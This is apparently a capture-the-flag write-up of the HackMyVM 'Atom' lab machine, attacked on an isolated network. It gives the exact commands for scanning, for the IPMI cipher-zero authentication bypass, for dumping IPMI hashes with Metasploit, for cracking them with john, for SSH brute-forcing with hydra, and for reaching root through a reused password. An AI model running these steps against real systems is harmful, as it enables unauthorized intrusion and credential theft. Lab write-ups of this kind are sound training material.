Nmap Results
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN --
10.9.9.0/24
-- that has no internet accessTCP Scan
# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:24 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.11
Nmap scan report for 10.9.9.11
Host is up (0.00047s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 16 14:34:26 2024 -- 1 IP address (1 host up) scanned in 1.81 seconds
ℹ️
Since only
tcp/22
is open, I'm going to try a UDP scan as well. SSH is almost never the first way into a box.UDP Scan
# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:32 2024 as: nmap -Pn --top-ports 300 -sU -T4 -oN udp-nmap-scan.txt 10.9.9.11
Warning: 10.9.9.11 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.9.9.11
Host is up (0.00080s latency).
Not shown: 283 closed udp ports (port-unreach)
PORT STATE SERVICE
623/udp open asf-rmcp
# Nmap done at Fri Aug 16 14:39:31 2024 -- 1 IP address (1 host up) scanned in 299.34 seconds
Service Enumeration
UDP/623
IPMI Vulnerabilities
In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through cipher type 0. This vulnerability, documented in detail at Dan Farmer's research, enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations.
Testing IPMI
💡
Again, we can authenticate to the IPMI server with any password given that a username is valid
Pulling Info from IPMI
ipmitool -I lanplus -C 0 -H 10.9.9.11 -U admin -P thisisnotthepassword user list
Usernames from IPMI
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false Unknown (0x00)
2 admin true false true ADMINISTRATOR
3 analiese true false true USER
4 briella true false true USER
5 richardson true false true USER
6 carsten true false true USER
7 sibylle true false true USER
8 wai-ching true false true USER
9 jerrilee true false true USER
10 glynn true false true USER
11 asia true false true USER
12 zaylen true false true USER
13 fabien true false true USER
14 merola true false true USER
15 jem true false true USER
16 riyaz true false true USER
17 laten true false true USER
18 cati true false true USER
19 rozalia true false true USER
20 palmer true false true USER
21 onida true false true USER
22 terra true false true USER
23 ranga true false true USER
24 harrie true false true USER
25 pauly true false true USER
26 els true false true USER
27 bqb true false true USER
28 karlotte true false true USER
29 zali true false true USER
30 ende true false true USER
31 stacey true false true USER
32 shirin true false true USER
33 kaki true false true USER
34 saman true false true USER
35 kalie true false true USER
36 deshawn true false true USER
37 mayeul true false true USER
38 true false false Unknown (0x00)
39 true false false Unknown (0x00)
40 true false false Unknown (0x00)
41 true false false Unknown (0x00)
42 true false false Unknown (0x00)
43 true false false Unknown (0x00)
44 true false false Unknown (0x00)
45 true false false Unknown (0x00)
46 true false false Unknown (0x00)
47 true false false Unknown (0x00)
48 true false false Unknown (0x00)
49 true false false Unknown (0x00)
50 true false false Unknown (0x00)
51 true false false Unknown (0x00)
52 true false false Unknown (0x00)
53 true false false Unknown (0x00)
54 true false false Unknown (0x00)
55 true false false Unknown (0x00)
56 true false false Unknown (0x00)
57 true false false Unknown (0x00)
58 true false false Unknown (0x00)
59 true false false Unknown (0x00)
60 true false false Unknown (0x00)
61 true false false Unknown (0x00)
62 true false false Unknown (0x00)
63 true false false Unknown (0x00)
Pulling Hashes from IPMI
sudo msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.9.9.11
set USERS_FILE usernames.txt
set OUTPUT_JOHN_FILE /home/ben/Pentest/Training/HackMyVM/Atom/hash
run
john --wordlist=rockyou.txt hash
TCP/22
hydra -I -v -C creds.txt ssh://10.9.9.11
Exploit
IPMI Protocol and Weak Passwords
The IPMI server running on the target is using a vulnerable IPMI version that allows the user to authenticate as any valid user on the target with no requirements for a valid password. We are then able to authenticate to the IPMI server, dump hashes, and crack any that are found in a word list.
ssh onida@10.9.9.11
Post-Exploit Enumeration
Operating Environment
OS & Kernel
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64 GNU/Linux
Current User
uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)
sudo command not found
Users and Groups
Local Users
onida:x:1000:1000:,,,:/home/onida:/bin/bash
Local Groups
users:x:100:onida
onida:x:1000:
Network Configurations
Network Interfaces
2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether bc:24:11:6e:ab:9b brd ff:ff:ff:ff:ff:ff
altname enp0s18
inet 10.9.9.11/24 brd 10.9.9.255 scope global dynamic noprefixroute ens18
valid_lft 6279sec preferred_lft 6279sec
inet6 fe80::889f:b1c2:3dfc:3d93/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:48:1f:93:dd brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:48ff:fe1f:93dd/64 scope link
valid_lft forever preferred_lft forever
Open Ports
tcp LISTEN 0 4096 127.0.0.1:43749 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
Interesting Files
/var/www/html/atom-2400-database.db
sqlite3 /var/www/html/atom-2400-database.db
sqlite3> .tables
select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm
Privilege Escalation
Cracking the User Hash
Becoming Root
💡
There is no
atom
user on the box when checking /etc/passwd
, so let's see if this password is also re-used for root
su root
Flags
User
f75390001fa2fe806b4e3f1e5dadeb2b
Root
d3a4fd660f1af5a7e3c2f17314f4a962